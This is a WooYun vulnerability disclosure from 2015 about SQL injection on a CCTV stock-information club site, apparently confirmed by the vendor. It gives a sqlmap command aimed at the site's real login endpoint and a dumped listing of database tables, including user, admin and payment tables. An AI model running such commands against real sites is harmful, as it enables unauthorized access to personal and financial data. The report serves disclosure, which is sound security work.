当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163554

漏洞标题:cctv证券资讯服务中心SQL注入

相关厂商:中国网络电视台

漏洞作者: hecate

提交时间:2015-12-22 17:01

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

sa权限

详细说明:

target: http://www.cctvstock.com/

sqlmap -u "http://club.cctvstock.com/tools/json/LoginPlus.aspx?action=login&callback=jsonp1450765749548&u=admin&p=admin"


11.png

漏洞证明:

Database: new_club
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| dbo.PE_Log                        | 72134   |
| dbo.CCTV_SP_Post_Draft            | 19078   |
| dbo.PE_Users                      | 18824   |
| dbo.CCTV_SP_Post_Comment          | 15396   |
| dbo.CCTV_SP_Sms_Record            | 10490   |
| dbo.PE_Contacter                  | 10334   |
| dbo.CCTV_SP_Event_BaoMing         | 7623    |
| dbo.CCTV_SP_Vod                   | 6518    |
| dbo.[VIEW_CCTV_SP_Member_Wrong!!] | 6152    |
| dbo.[VIEW_CCTV_SP_Member_Wrong!!] | 6152    |
| dbo.PE_Files                      | 4721    |
| dbo.View_CCTV_SP_Caifu_Report     | 4607    |
| dbo.CCTV_SP_Live                  | 4242    |
| dbo.PE_U_UserText                 | 3661    |
| dbo.PE_Region                     | 2917    |
| dbo.PE_CommonModel                | 1301    |
| dbo.PE_U_Article                  | 1161    |
| dbo.PE_ContentPermission          | 1054    |
| dbo.PE_Role_Node_Permissions      | 1017    |
| dbo.PE_InfoFileRelation           | 988     |
| dbo.CCTV_SP_Product_Record        | 965     |
| dbo.PE_StatDay                    | 808     |
| dbo.CCTV_SP_Member_Class          | 553     |
| dbo.CCTV_SP_Member_Class          | 553     |
| dbo.View_CCTV_SP_Class_Member     | 553     |
| dbo.View_CCTV_SP_Class_Live       | 534     |
| dbo.View_CCTV_SP_Class_Live       | 534     |
| dbo.PE_ContentCharge              | 326     |
| dbo.PE_PointLog                   | 303     |
| dbo.CCTV_SP_Post_Attachment       | 162     |
| dbo.CCTV_SP_Post_Attachment       | 162     |
| dbo.PE_GroupNodePermissions       | 161     |
| dbo.CCTV_SP_Info                  | 104     |
| dbo.PE_Nodes_Model_Template       | 96      |
| dbo.PE_Nodes_Model_Template       | 96      |
| dbo.PE_GroupFieldPermissions      | 92      |
| dbo.PE_U_New_Front_Img            | 58      |
| dbo.CCTV_SP_Class                 | 47      |
| dbo.PE_U_GuestBook                | 45      |
| dbo.PE_Advertisement              | 41      |
| dbo.PE_AdZone                     | 38      |
| dbo.PE_StatMonth                  | 38      |
| dbo.PE_Zone_Advertisement         | 38      |
| dbo.CCTV_SP_Announce              | 37      |
| dbo.PE_SurveyRecord1              | 34      |
| dbo.PE_Roles_Permissions          | 33      |
| dbo.PE_Roles_Permissions          | 33      |
| dbo.PE_PaymentLog0                | 32      |
| dbo.PE_PaymentLog0                | 32      |
| dbo.PE_Dictionary                 | 25      |
| dbo.PE_Model                      | 25      |
| dbo.PE_KeywordRelationShip        | 17      |
| dbo.PE_IncludeFile                | 16      |
| dbo.PE_Admin_Roles                | 12      |
| dbo.PE_Admin_Roles                | 12      |
| dbo.PE_AdminProfile               | 12      |
| dbo.PE_Keywords                   | 11      |
| dbo.PE_ModelTemplates             | 11      |
| dbo.PE_PayPlatForm                | 11      |
| dbo.PE_ProcessStatusCode          | 11      |
| dbo.PE_Status                     | 10      |
| dbo.PE_BankrollItem0              | 9       |
| dbo.PE_BankrollItem0              | 9       |
| dbo.PE_UserGroups                 | 8       |
| dbo.CCTV_SP_DianBo                | 7       |
| dbo.PE_PaymentType                | 7       |
| dbo.PE_StatYear                   | 7       |
| dbo.PE_U_Report_Img               | 7       |
| dbo.PE_DeliverType                | 6       |
| dbo.PE_Courier                    | 5       |
| dbo.PE_U_Front_Img                | 5       |
| dbo.PE_Role_Special_Permissions   | 4       |
| dbo.PE_U_SP_Event_Img             | 4       |
| dbo.PE_U_SP_Event_Img             | 4       |
| dbo.PE_FlowProcess                | 3       |
| dbo.PE_InfoNextProcessRoles       | 3       |
| dbo.PE_Process_Roles              | 3       |
| dbo.PE_SpecialCategory            | 3       |
| dbo.PE_SurveyVote                 | 3       |
| dbo.CCTV_SP_Recommend             | 2       |
| dbo.CCTV_SP_Talk                  | 2       |
| dbo.PE_StatWeek                   | 2       |
| dbo.CCTV_SP_Bbs_Attachment        | 1       |
| dbo.CCTV_SP_Bbs_Attachment        | 1       |
| dbo.CCTV_SP_Consult               | 1       |
| dbo.PE_GroupSpecialPermissions    | 1       |
| dbo.PE_StatInfoList               | 1       |
| dbo.PE_StatVisitor                | 1       |
| dbo.PE_StatVisitor                | 1       |
| dbo.PE_Survey                     | 1       |
| dbo.PE_U_FriendSite               | 1       |
| dbo.PE_ValidLog                   | 1       |
| dbo.PE_Version                    | 1       |
| dbo.PE_WorkFlows                  | 1       |
+-----------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-25 18:00

厂商回复:

非常感谢。

最新状态:

暂无